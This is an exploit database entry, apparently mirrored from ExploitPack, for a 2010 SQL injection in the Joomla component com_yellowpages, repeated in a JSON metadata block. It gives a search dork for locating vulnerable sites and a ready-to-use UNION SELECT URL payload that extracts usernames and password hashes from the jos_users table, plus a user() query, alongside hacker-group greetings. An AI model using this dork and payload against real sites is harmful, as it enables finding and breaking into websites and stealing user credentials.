Search...

Joomla! Component com_yellowpages - SQL Injection

2010-08-09T00:00:00

ID EXPLOITPACK:352DC76F07691132CD4903266CB2E3D9
Type exploitpack
Reporter al bayraqim
Modified 2010-08-09T00:00:00

Description

Joomla! Component com_yellowpages - SQL Injection

                                        
                                            ===============================================================
Joomla Component (com_yellowpages) SQL Injection Vulnerability 
===============================================================


# Exploit Title : Joomla "com_yellowpages" Sql Injection Vulnerability
# Date : 9- 8 - 2010

# Author : _aL_bayraqim_ 

# BORDO BERELİLER GRUP KOMUTANLIGI [..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!]
############################################################
Dork = inurl:/index.php?option=com_yellowpages 
############################################################
--- SQL Injection Vulenrability ---
SQL Injection Vulenrability component "com_yellowpages"
http://site.com/index.php?option=com_yellowpages&cat=1923[SQL]
############################################################
===[ Exploit ]===
http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
+Union+select+user()+from+jos_users--
############################################################
#.Türk oğlu, !!..Türk kızı !!..Türklügünü Koru!..
############################################################

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:24", "references": [], "description": "\nJoomla! Component com_yellowpages - SQL Injection", "edition": 1, "reporter": "al bayraqim", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2010-08-09T00:00:00", "title": "Joomla! Component com_yellowpages - SQL Injection", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:24", "rev": 2}, "score": {"value": 0.5, "vector": "NONE", "modified": "2020-04-01T19:04:24", "rev": 2}, "vulnersScore": 0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-08-09T00:00:00", "id": "EXPLOITPACK:352DC76F07691132CD4903266CB2E3D9", "href": "", "viewCount": 3, "sourceData": "===============================================================\nJoomla Component (com_yellowpages) SQL Injection Vulnerability \n===============================================================\n\n\n# Exploit Title : Joomla \"com_yellowpages\" Sql Injection Vulnerability\n# Date : 9- 8 - 2010\n\n# Author : _aL_bayraqim_ \n\n# BORDO BEREL\u0130LER GRUP KOMUTANLIGI [..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!]\n############################################################\nDork = inurl:/index.php?option=com_yellowpages \n############################################################\n--- SQL Injection Vulenrability ---\nSQL Injection Vulenrability component \"com_yellowpages\"\nhttp://site.com/index.php?option=com_yellowpages&cat=1923[SQL]\n############################################################\n===[ Exploit ]===\nhttp://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--\n+Union+select+user()+from+jos_users--\n############################################################\n#.T\u00fcrk o\u011flu, !!..T\u00fcrk k\u0131z\u0131 !!..T\u00fcrkl\u00fcg\u00fcn\u00fc Koru!..\n############################################################", "cvss": {"score": 0.0, "vector": "NONE"}}